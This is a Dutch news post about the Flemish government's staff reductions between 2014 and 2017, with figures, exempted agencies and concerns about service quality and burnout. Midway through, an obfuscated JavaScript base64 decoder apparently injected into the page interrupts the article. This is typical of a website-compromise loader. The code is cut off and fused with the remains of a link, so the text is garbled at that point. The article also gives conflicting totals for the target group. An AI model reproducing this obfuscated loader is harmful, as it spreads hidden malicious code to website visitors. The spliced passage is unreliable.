Reacties uitgeschakeld voor 1552 personeelsleden minder dan in 2014 bij Vlaamse Administratie

1552 personeelsleden minder dan in 2014 bij Vlaamse Administratie

Door | 15 april 2018 | Nieuws

Bron: Vlaamse Administratie, vrijdag, 30 maart 2018

Eind 2017 waren er 1552 collega’s minder dan aan het begin van deze regeerperiode in 2014. De Vlaamse overheid moet het tegen eind 2019 met 1950 mensen minder te doen, zoals het regeerakoord 2014-2019 vooropstelde. Op dit moment is 80 procent van de totale besparingsdoelstelling gerealiseerd.

De besparingsdoelgroep bestaat uit 17.425 personeelsleden. Tegen eind 2019 moeten er dus nog 398 personeelsleden bespaard worden.

Deze entiteiten worden buiten de besparingen gehouden: Jongerenwelzijn, OPZ Geel, OPZC Rekem, Vlaamse Maatschappij voor Sociaal Wonen, VDAB, Vlaams Agentschap voor Personen met een Handicap en Kind en Gezin, een deel van Plantentuin Meise, de topsporters van Sport Vlaanderen en het personeel van DAB Vloot en DAB Loodswezen.

Evolutie van de personeelsbesparingen

Het Vlaams regeerakkoord stelt dat het aantal personeelsleden in dienst van de Vlaamse overheid verder en significant moet dalen door het voeren van een selectief vervangingsbeleid, met blijvende aandacht voor een kwaliteitsvolle dienstverlening. In de beleidsnota Bestuurszaken werd de vooropgestelde personeelsinkrimping als volgt vertaald:

‘Tegen eind 2019 moet de personeelsomvang binnen de Vlaamse overheid dalen met 1.950 personeelsleden. Er is een maximale afstemming nodig tussen het opvolgen van de aankomende pensioneringen, het selectief vervangen en een afslanking van het aantal taken met het kerntakenplan als leidraad.’

De besparingsdoelgroep bestaat uit 17.554 personeelsleden.

Na 3 jaar zijn er in totaal reeds 1.552 personeelsleden bespaard of 80% van het totaal te besparen aantal (1.950). Dat betekent dat er tegen eind 2019 nog 398 personeelsleden moeten bespaard worden.

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/bedrijfsinformatie/personeelsbesparingen">Grafiek van de personeelsbesparingen

Toch is de vraag hoever de besparingen nog kunnen gaan. Het Rekenhof waarschuwde in 2016 voor de gevolgen van de besparingen voor de dienstverlening.
Dit gegeven is zowel voor burgers, als lokale overheden meer en meer voelbaar.

Ook de cijfers van het ziekteverzuim blijven stijgen. Stress/burn-out zijn daarbij een veel voorkomende reden.

636 total views, 2 today